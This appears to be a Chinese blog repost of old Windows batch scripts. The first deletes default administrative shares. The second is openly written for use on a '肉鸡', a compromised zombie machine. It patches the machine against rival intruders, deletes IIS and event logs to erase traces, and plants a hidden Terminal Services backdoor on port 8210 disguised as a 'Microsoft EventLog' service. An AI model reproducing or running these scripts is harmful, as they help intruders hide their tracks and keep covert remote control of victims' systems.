很老的东西
1、删除win2k/xp系统默认共享的批处理
原创:Ex4rch Mail:Ex4rch@hotmail.com QQ:1672602
做了一点参数跳转修改
@echo preparing to delete all the default shares.when ready press any key.
@pause
@echo off
:Rem check parameters if null show usage.
if {%1}=={} goto :Usage
:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
if {%2}=={} goto :Finish
net share %2$ /delete
if {%3}=={} goto :Finish
net share %3$ /delete
if {%4}=={} goto :Finish
net share %4$ /delete
if {%5}=={} goto :Finish
net share %5$ /delete
if {%6}=={} goto :Finish
net share %6$ /delete
if {%7}=={} goto :Finish
net share %7$ /delete
if {%8}=={} goto :Finish
net share %8$ /delete
if {%9}=={} goto :Finish
net share %9$ /delete
:Finish
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:/delshare.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/lanmanserver/parameters]>> c:/delshare.reg
echo "AutoShareWks"=dword:00000000>> c:/delshare.reg
echo "AutoShareServer"=dword:00000000>> c:/delshare.reg
echo Nowing using the registry file to chang the system default properties.
regedit /s c:/delshare.reg
echo Deleting the temprotarily files.
del c:/delshare.reg
goto :END
:Usage
echo.
echo ----------------------------------------------------------
echo.
echo ****************A example for batch file *****************
echo *[Use batch file to change the sysytem share properties.] *
echo * *
echo * *
echo * *
echo * *
echo * Error:Not enough parameters *
echo * Please enter the share disk you wanna delete *
echo ****************************************************
echo For instance,to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disklable is not as C: D: E:,Please chang it youself.
echo.
echo example:
echo If locak disklable are C: D: E: X: Y: Z:,you should chang the command into :
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a useing ***
echo.
echo ----------------------------------------------------------
goto :EOF
:END
echo.
echo ----------------------------------------------------------
echo.
echo OK,delshare.bat has deleted all the share you assigned.
echo
echo.
echo ----------------------------------------------------------
echo.
:EOF
echo end of the batch file
2、全面加固系统(给肉鸡打补丁)的批处理文件
A、禁止不必要共享
@echo Windows Registry Editor Version 5.00 >patch.dll
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/lanmanserver/parameters] >>patch.dll
@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [禁止共享]
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Lsa] >>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [禁止匿名登录]
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/NetBT/Parameters] >>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [禁止及文件访问和打印共享]
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/@REMoteRegistry] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Schedule] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [禁止登录前关机]
@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [禁止显示前一个登录用户名称]
@regedit /s patch.dll
@del patch.dll
B、清除肉鸡所有日志,禁止一些危险的服务( c:/winnt 需要修改 %systemboot%)
@net stop w3svc
@net stop event log
@del c:/winnt/system32/logfiles/w3svc1/*.* /f /q
@del c:/winnt/system32/logfiles/w3svc2/*.* /f /q
@del c:/winnt/system32/config/*.event /f /q
@del c:/winnt/system32dtclog/*.* /f /q
@del c:/winnt/*.txt /f /q
@del c:/winnt/*.log /f /q
@net start w3svc
@net start event log
@rem [删除日志]
@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@echo The server has been patched,Have fun.
@REM [禁止一些危险的服务。]
C、修改肉鸡的terminnal service留跳后路。(好像不太好使,终端服务程序,估计是2000上的)
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Termina l Server/WinStations/RDP-Tcp] >>patch.dll
@echo "PortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Termina l Server/Wds/rdpwd/Tds/tcp >>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/SecuService] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00 ,52,00,6f,00,6f,00,/ >>patch.dll
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00, 32,00,5c,00,65,/ >>patch.dll
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78, 00,65,00,00,00 >>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Description"="Keep record of the program and windows message。" >>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/termservice] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c:/winnt/system32/termsrv.exe c:/winnt/system32/eventlog.exe
@Del patch.dll
@REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路]
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
